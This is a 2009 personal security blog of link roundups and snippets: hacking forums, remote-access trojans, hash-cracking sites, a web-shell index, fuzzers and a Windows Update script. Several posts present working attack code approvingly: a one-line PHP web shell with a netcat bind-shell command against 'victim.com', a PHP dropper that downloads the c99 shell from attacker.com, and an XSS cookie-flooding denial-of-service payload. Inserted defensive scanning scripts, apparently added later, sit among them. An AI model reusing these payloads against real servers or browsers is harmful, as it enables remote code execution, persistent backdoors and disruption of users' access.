Friday, May 29, 2009

What is a Rootkit? You sure?

A very well written article on some of the history and details of what a “rootkit” is:

http://www.omninerd.com/articles/r00tkit_Analysis_What_Is_A_Rootkit/print_friendly


“Underground Hacking” Links

Here are just some sites that I wanted to get off my open tabs and check out later – standard warning applies, do not inherently trust what you find on these pages:

http://hackxcrack.es/

http://www.darkc0de.com/index.shtml

http://www.playhack.net/

http://trythis0ne.com/?page=toolz

http://avhackers.com/index.php

https://www.ihteam.net/#

http://www.w4ck3d.org/forums/

http://www.megapanzer.com (Yes you have seen this one before, but in reference to their RAT)

http://hackforums.net

================================

Un.Aware eZine ( http://www.awarenetwork.org/etc/)

Uninformed eZine ( http://uninformed.org/? )

Phrack eZine ( http://phrack.org/ )

Phrack issue #64 by TCOLH - “A brief history of the Underground scene” ( http://phrack.org/issues.html?issue=64&id=4&mode=txt )

Tuesday, May 26, 2009

Force Windows Update Script

Stolen from: http://msmvps.com/blogs/athif/pages/66375.aspx

Copy and Paste the code below into a text file and name it AUForceUpdate.cmd


=======================================================================
@echo off
Echo This batch file will Force the Update Detection from the AU client: 
Echo 1. Stops the Automatic Updates Service (wuauserv)
Echo 2. Deletes the LastWaitTimeout registry key (if it exists) 
Echo 3. Deletes the DetectionStartTime registry key (if it exists) 
Echo 4. Deletes the NextDetectionTime registry key (if it exists)
Echo 5. Restart the Automatic Updates Service (wuauserv) 
Echo 6. Force the detection 
Pause
@echo on
net stop wuauserv
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v LastWaitTimeout /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v DetectionStartTime /f
Reg Delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v NextDetectionTime /f
net start wuauserv
wuauclt /detectnow
@echo off
Echo This AU client will now check for the Updates on the Local WSUS Server.
Pause
==================================================================

tail -f, I must leave you for another

Stolen from: http://www.shell-fu.org/lister.php?id=820


tail -f


This tails the log file and the '-f' tells tail to follow the file, so anything new added to the file will also be printed to the screen.

Another option is:

less +F /var/log/messages

The +F option turns on less 'follow mode'. It is similar to tail -f but you will have the benefits of less, like scrolling up and down. To stop tailing, use Ctrl-C and to resume it, press Shift-F.

Durzosploit - Javascript Exploit Generator

Takes script('XSS Working'); to the next level:
http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction

Thursday, May 21, 2009

A Cheat, A Method and a Book

So I wanted to get these down before they scrolled by in twitter:

Nick Harbour's Reverse Engineering Cheat Sheet:

http://www.rnicrosoft.net/docs/X86_Win32_Reverse_Engineering_Cheat_Sheet.pdf


Lenny Zeltser's Reverse Engineering Cheat Sheet:

http://www.zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html


And the Unix Toolbox. DO NOT underestimate the power of this booklet:

http://cb.vu/unixtoolbox.xhtml


Tuesday, May 19, 2009

Defcon CTF and Qualifiers: Past Challenges and Answers

Even if you have never competed and aren't signed up to compete this year, there is a ton of learning to be had just from what they have done in the past. Take the time to look at the answers and learn from them.
http://nopsr.us/

100 Free Online Courses (MIT and such)

Tarantula - A fuzzing spider

The only homepage I could find: http://github.com/relevance/tarantula

Their quote:
a big hairy fuzzy spider that crawls your site, wreaking havoc


Haven't tried it yet, plan to.

Handwriting Analysis book on Scribd

If you haven't checked out Scribd before, there are a bunch of great books for free there. One of which is:

Handwriting Analysis & Success Secrets by Bart A Baggett

http://www.scribd.com/doc/2902062/Handwriting-Analysis-Success-Secrets-Bart-A-Baggett

Dranzer - ActiveX Fuzzer

http://www.cert.org/vuls/discovery/dranzer.html

Here is what they say about it:

Attackers frequently take advantage of vulnerabilities in ActiveX controls to compromise systems using Microsoft Internet Explorer. A programming or design flaw in an ActiveX control can allow an attacker to execute arbitrary code by convincing a user to view a specially crafted web page. Since 2000, we have seen a significant increase in vulnerabilities in ActiveX controls.

We have developed Dranzer, a tool that enables users to examine effective techniques for fuzz testing ActiveX controls. By testing a large number of ActiveX controls, we can provide some insight into the current state of ActiveX security. When we discover new vulnerabilities, we practice responsible disclosure principles and perform the necessary remediation steps.

OfficeCat: Look for Exploits in MS Office Documents

Recently commented on by BreakingPoint (here) as the tool to use when looking for exploits in Office Documents.

Created by Lurene Grenier of the Sourcefire VRT:
http://www.snort.org/vrt/tools/officecat.html

Friday, May 15, 2009

PHP 1-line execute

<?php system($_GET[cmd]);?>

echo that to a file on a system, or use the previous example to call it, and you can run http://victim.com/whatever.php?cmd=nc -lvp 4040 -e /bin/bash and you'll have a shell waiting for you.

Load txt file as PHP

A pretty sick use of php ;-)

<?php
       $shell = "http://attacker.com/c99madshell.txt"; //use something less obvious like readme.txt
       $code = file_get_contents($shell);
       $fp=fopen("Sh3ll.php","w+");
       fwrite($fp, $code);
       fclose($fp);
?>
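
Both snippets above leave static traces in a web root: request input passed straight to a command-execution function, and a script that fetches remote content and writes it out as a PHP file. The scan below is an added example, not code from the original posts; the regexes are heuristics, and the sample files and the attacker.example host are constructed.

```shell
#!/bin/sh
# Added example: heuristic scan of a web root for the two PHP patterns above.
# Regexes and sample files are constructed for illustration.

# Signal 1: a command-execution call whose argument comes from the request.
EXEC_RE='(system|passthru|shell_exec|exec|popen|proc_open|eval)[[:space:]]*\(.*\$_(GET|POST|REQUEST|COOKIE)'
# Signal 2 (all three required): remote URL literal, fetch call, write to a PHP file.
URL_RE='(https?|ftp)://'
FETCH_RE='(file_get_contents|curl_exec|copy)[[:space:]]*\('
WRITE_RE='(fopen|file_put_contents)[[:space:]]*\([^,)]*\.(php|phtml)'

# Print "<finding><TAB><path>" for every PHP-like file under directory $1.
scan_webshells() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.inc' \) |
    while IFS= read -r f; do
        if grep -Eq "$EXEC_RE" "$f"; then
            printf 'exec-from-request\t%s\n' "$f"
        fi
        if grep -Eq "$URL_RE" "$f" && grep -Eq "$FETCH_RE" "$f" &&
           grep -Eq "$WRITE_RE" "$f"; then
            printf 'php-dropper\t%s\n' "$f"
        fi
    done
}

# Constructed web root: the two snippets from the posts plus one benign page.
make_samples() {
    mkdir -p "$1/uploads"
    cat > "$1/uploads/whatever.php" <<'EOF'
<?php system($_GET[cmd]);?>
EOF
    cat > "$1/loader.php" <<'EOF'
<?php
$shell = "http://attacker.example/readme.txt";
$code = file_get_contents($shell);
$fp = fopen("Sh3ll.php", "w+");
fwrite($fp, $code);
EOF
    cat > "$1/status.php" <<'EOF'
<?php
$q = htmlspecialchars($_GET['q']);
echo file_get_contents("https://api.example.com/status?q=" . urlencode($q));
EOF
}

demo_root=$(mktemp -d)
make_samples "$demo_root"
scan_webshells "$demo_root"
rm -rf "$demo_root"
```

The benign status.php fetches a remote URL but never writes a PHP file, so requiring all three dropper signals keeps it out of the results.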


Shell Code Development

Place has some pretty sick shellcode: http://www.shell-storm.org/

Huge List of Online Crackers

Don't know if all of these are online still or not:
SOURCE:(http://blackhat.ge/?page_id=29)

http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/

md5:
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php

md4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/

sha1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/


Misc:
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…p;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/

User Profile Deletion Utility

Index of PHP Shells

REVIEW THE CODE BEFORE USING ANY WEB SHELL!!

http://blacknite.eu/php_shells/


Thursday, May 14, 2009

Finding SUID/SGID root programs

Source: http://www.faqs.org/docs/securing/chap5sec62.html

EDIT: It doesn't look like it, but it's all one line:
find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -lg {} \;
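
For ongoing monitoring, the same find expression can be compared against an approved list so that only new or writable set-id files stand out. This is an added example, not from the source linked above; the directory tree, file names and baseline file are constructed, and the demo only touches a temporary directory.

```shell
#!/bin/sh
# Added example: baseline check built on the find command above.
# Paths, file names and the baseline format are constructed.

# Sorted list of set-uid/set-gid regular files under $1 (-xdev: stay on one filesystem).
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
        LC_ALL=C sort
}

# Set-id files under $1 that are missing from the approved list in file $2.
new_setid() {
    cur=$(mktemp); base=$(mktemp)
    list_setid "$1" > "$cur"
    LC_ALL=C sort -u "$2" > "$base"
    LC_ALL=C comm -13 "$base" "$cur"
    rm -f "$cur" "$base"
}

# Set-id files that group or other can overwrite: replaceable privileged code.
writable_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null | LC_ALL=C sort
}

# Constructed tree: one approved set-uid file, one unexpected world-writable
# set-uid file, one ordinary file. The baseline lists only the approved path.
make_tree() {
    mkdir -p "$1/root/bin" "$1/root/tmp"
    : > "$1/root/bin/passwd";  chmod 4755 "$1/root/bin/passwd"
    : > "$1/root/tmp/.helper"; chmod 4777 "$1/root/tmp/.helper"
    : > "$1/root/bin/ls";      chmod 0755 "$1/root/bin/ls"
    printf '%s\n' "$1/root/bin/passwd" > "$1/baseline.txt"
}

demo=$(mktemp -d)
make_tree "$demo"
echo "not in baseline:"; new_setid "$demo/root" "$demo/baseline.txt"
echo "writable set-id:"; writable_setid "$demo/root"
rm -rf "$demo"
```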


Wednesday, May 13, 2009

WIGS - Website Information Gathering Scanner

A TON of information, in one click without touching the site yourself.. ;-)

http://sucuri.net/index.php?page=scan

Also, my other favorite is: http://www.serversniff.net/



Tuesday, May 12, 2009

List of x86 Instructions

Don't Censor Me!

LeetUpload.com

An awesome repository of interesting do-dads and toys for hackers / security 'pros'

Proceed with caution. There are pointy objects ahead:
http://www.leetupload.com/

"Official" Metasploit Documentation

Hex Editor - Frhed

I've been searching for a free hex editor that had the features I need and the search is finally over.

http://frhed.sourceforge.net/

Thanks @marcusjcarey


Sunday, May 10, 2009

XSS based Client-side DoS

Inflates the client's cookies for the site to 200 KB per subdomain.
http://pastebin.com/f3dfe04f7

/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>

I pasted the code in case it gets lost on Pastebin

Fravia's Swansong

Saturday, May 9, 2009

This is why you're fat

Not security related, but hilarious. Come on, who hasn't had a Choco Taco.
http://thisiswhyyourefat.com

Sunday, May 3, 2009

Stock Photo Sites

Links to 16 of them. Why is this good for you? It will help with those presentations you have to give:
http://www.softalize.com/2009/04/14/16-ultimate-collection-of-free-stock-photo-sites/

ErrMess

Another really fun RAT to play with: http://www.errmess.com/

Megapanzer

RAT, and some interesting history dumping ;-)

http://www.megapanzer.com/source-code/